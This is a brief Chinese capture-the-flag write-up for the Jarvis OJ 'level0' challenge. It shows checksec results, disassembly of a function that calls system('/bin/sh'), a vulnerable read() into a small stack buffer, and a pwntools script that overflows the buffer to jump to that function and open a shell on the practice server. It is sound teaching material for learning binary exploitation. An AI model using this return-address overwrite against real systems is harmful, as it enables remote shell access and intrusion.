查保护和运行操作系统
liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0'Arch: amd64-64-littleRELRO: No RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000) 开启了NX保护,64位系统
text:0000000000400596 ; __unwind {
.text:0000000000400596 push rbp
.text:0000000000400597 mov rbp, rsp
.text:000000000040059A mov edi, offset command ; "/bin/sh"
.text:000000000040059F call _system
.text:00000000004005A4 pop rbp
.text:00000000004005A5 retn
.text:00000000004005A5 ; } // starts at 400596
.text:00000000004005A5 callsystem endp
.text:00000000004005A5有system(“/bin/sh”)函数
ssize_t vulnerable_function()
{char buf; // [rsp+0h] [rbp-80h]return read(0, &buf, 0x200uLL);
}栈溢出
from pwn import *s_addr=0x0000000000400596
p=remote("pwn2.jarvisoj.com",9881)
p.recvline()
p.sendline("A"*0x80+'A'*8+p64(s_addr))
p.interactive()与32位不同之处:rbp是8个字节。打包用的函数是p64()